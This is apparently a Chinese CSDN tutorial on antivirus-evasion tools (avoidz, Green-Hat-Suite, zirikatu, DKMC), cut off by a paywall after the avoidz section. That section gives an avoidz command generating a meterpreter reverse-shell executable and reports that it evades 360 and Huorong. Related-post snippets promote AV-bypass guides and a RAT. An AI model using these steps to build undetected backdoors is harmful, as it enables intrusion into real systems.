TideSec远控免杀学习五(avoidz+Green-Hat-Suite+zirikatu+DKMC)

最新推荐文章于 2024-04-11 09:53:05 发布
最新推荐文章于 2024-04-11 09:53:05 发布
阅读量758 收藏 4
点赞数
分类专栏: 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fallfeather/article/details/104294585
版权
本文介绍了TideSec旗下的避免杀毒软件检测的工具,包括avoidz、Green-Hat-Suite、zirikatu和DKMC的使用方法和免杀效果。通过这些工具,可以生成C#、golang等语言的免杀exe,以及利用PowerShell执行混淆的shellcode。各工具有不同的免杀率,如avoidz在VT上的免杀率为37/70,Green-Hat-Suite为23/70,zirikatu为39/71,DKMC为8/55。尽管免杀效果各异,但这些工具展示了免杀技术的不同策略和思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

参考资料

官方使用教程:https://www.youtube.com/watch?v=ZilOByKkrVk

官方使用教程:https://github.com/Green-m/green-hat-suite/wiki/Use-green-hat-suite

Msf&zirikatu免杀结合利用:http://www.secist.com/archives/3113.html

avoidz

介绍

Avoidz是一个比较使用比较简单的小工具,利用msf生成powershell的shellocde,然后利用c#、python、go、ruby等语言对shellcode进行编译生成exe而达到免杀的效果,套路比较简单,但免杀效果还算不错。

安装

git clone https://github.com/M4sc3r4n0/avoidz
apt install mingw-w64        #apt安装源中已经删除了mingw32,所以只能安装mingw-w64,之后在做32位的软链接
ln -s /usr/bin/i686-w64-mingw32-gcc /usr/bin/i586-mingw32msvc-gcc    #做个软链接,方便软件识别的到
chmod +x setup.sh
./setup.sh

 

使用avoidz编译C#生成exe(VT免杀率37/70)

提供3种C代码编译成exe的方式,想了解详情的可以cat avoidz.rb查看具体区别

我以第一种为例进行测试

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f c1

默认文件生成到root目录下

 可以正常上线

360和火绒都能过静态,但是动态会报执行powershell,所以powershell这块的命令执行真的有点难搞

上vt:

最低0.47元/天 解锁文章
TideSec学习三(Venom+Shellter)
fa1lr4in的小博客
02-11 1512
参考链接: 利用meterpreter下的Venom后门:https://www.cnblogs.com/wh4am1/p/7469625.html 后门venom :https://www.ggsec.cn/venom.html msf及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html Venom Venom和Veil...
2011超详细过360全套教程【语音】
06-19
2011超详2011超详细过360全套教程【语音】细过2011超详细过360全套教程【语音】360全套教程【语音】2011超详细过360全套教程【语音】
delphi经典教学
weixin_34096182的博客
04-18 271
转载自甲壳虫论坛 1:加垃圾汇编代码。 其实许多的朋友都是知道的,Delphi支持在代码中嵌套汇编代码。也就是说,如果加入了垃圾汇编代码,就网网可以直接过。 例如: asm nop nop nop end; 这样的形式。。。可以在多处加入这样的垃圾代码,该招数对瑞星效果不错, 2:修改单元文件名。 许多的毒软件喜欢查单元文件名,往往把单元文件...
从入门到实践
混子
01-23 6677
前几天突然看到一个大佬写的,就极其好奇,于是乎就看到这个大佬写的学习,把之前不懂的地方也都整明白了,特别感谢白师傅和卓师傅,这篇文章主要是
知识汇总
goddemon
09-08 7021
veil工具基础使用+进阶 ①启动方法 ①cd /opt ② ls ③veil(运行veil即可) 使用方法 如 生成go语言的马 use 16 set lhost ip set lport 端口 generate#(执行即可) ②结合cs进行 实操(生成go语言的马) ①cs使用生成一个go语言类型的payload ②use 17 ③需要的设置变量类(具体参数设置的含义) BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试) CLICKT
从入门到实践 (11) 终结篇
weixin_46236101的博客
03-13 4706
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《从入门到实践》系列文章目录: 1、从入门到实践 (1)基础篇 2、从入门到实践 (2)工具总结篇 3、从入门到实践 (3)代码篇-C/C++ 4、从入门到实践 (4)代码篇-C# 5、从入门到实践 (5)代码篇-Python 6、从入门到实践 (6)代码篇-Powershell 7、从入门到实践
2014年8月份教程 所以集结在TXT文档中
08-18
很牛B的 如果你还是新手 还不会可以观看此视频 保证学会 2014年 8月 的
必看(软技术整理资料)
qq_18811919的博客
03-26 486
一.虚拟机概述 1.仿真技术 (1)硬件仿真 定义:通过软件仿真操作系统所需要的硬件环境,包括 CPU、内存、总线等 使用案例:VMware 应用场景: 搭建反病毒分析平台,如 ThreatExpert等搭建云安全集群; (2)指令集仿真 定义:通过软件仿真特定(真实或虚拟)指令集的执行行为,例如通过仿真全部 x86 指令的行为来仿真 x86 CPU; 使用案例:Java VM,VMProtect 应用场景: 代码逻辑序列化,如ClamAV 支持把查毒代码编译成 LLVM 中间代码(
入门学习---------2019.8.27
ins_Digger的博客
08-27 993
写一个啃书记录,写一下知识点和自己的理解。 peace! (主要是图书馆借的书不能圈圈画画,我也不想动笔,写一下博客挺好的。) 这篇随笔的大部分内容来自《黑客攻防》 第一章说的的历史,点了一下和Rootkit的区别。 Rootkit的词条介绍 当然,一个菜鸟怎么会理解呢,只能默默地记一下,接受了。 第二章 基础知识 罗列一下个人觉得比较重要的点: 1.基于文件扫描的反病毒技术 ...
pcshare高级
02-09
pcshare高级版,过小红伞,瑞星等毒软件。
Meloduy1.2完美修复版+源码
07-30
Melody完美修复版+源码,暂时,别给我评论说软件报毒,这话太傻了,使用的时候关闭软,不然生成不了服务端(既小马)。无法在虚拟机中运行!
专题文章(3)-msf自(VT率35/69)
gclome的博客
03-14 535
原文链接:专题文章(3)-msf自(VT率35/69) 能力一览表 几点说明: 1、上面表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指...
专题 13----zirikatu
qq_41683305的博客
03-27 747
0x01 能力一览表 几点说明: 1、上表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(202...
专题(15)-DKMC(VT率8/55)
Ms08067安全实验室
04-13 691
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1、专题(1)-基础篇:https:...
专题(15)-DKMC
qq_41683305的博客
03-27 1016
0x01 能力一览表 几点说明: 1、上表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(202...
专题(13)-zirikatu(VT率39/71)
Ms08067安全实验室
03-30 1105
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1、...
TideSec学习四(BackDoor-Factory+Avet+TheFatRat)
fa1lr4in的小博客
02-12 3464
BackDoor-Factory 介绍 BackDoor-factory,又称后门工厂(BDF),BDF是也是一款老牌的神器,其作者曾经在2015年的blackhat大会上介绍过该工具。但是作者已经于2017年停止更新,效果就算现在来看也还算不错的。 原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来...
在线云沙箱分析平台
qq_45397014的博客
08-29 1586
在线分析平台用于分析恶意软件的行为、检测和避开安全防护机制。它们帮助研究人员和安全专家评估恶意软件的隐蔽性和能力,确保防御措施能够有效识别和应对潜在威胁。
探索未来安全——TideSec Tide项目详解
最新发布
gitblog_00051的博客
04-11 409
探索未来安全——TideSec Tide项目详解 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是由TideSec团队开发的一款开源的安全评估工具,它旨在帮助开发者和安全专家更有效地检测代码中的潜在漏洞和不安全的编程实践。该项目基于Python语言编写,利用现代软件工程方法,将静态分析、动态分析及模糊测试等技术融合在一起,为保障软件安全提供了一站式的解决方案。 技术分...
全面掌握技术与工具使用
- **专题(12)-Green-Hat-Suite(VT率23-70).pdf**:Green-Hat-Suite是一个后门工具包,它可以帮助用户创建复杂的后门程序。本专题可能涵盖该工具的使用方法,以及如何使其于被毒软件检测。 - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值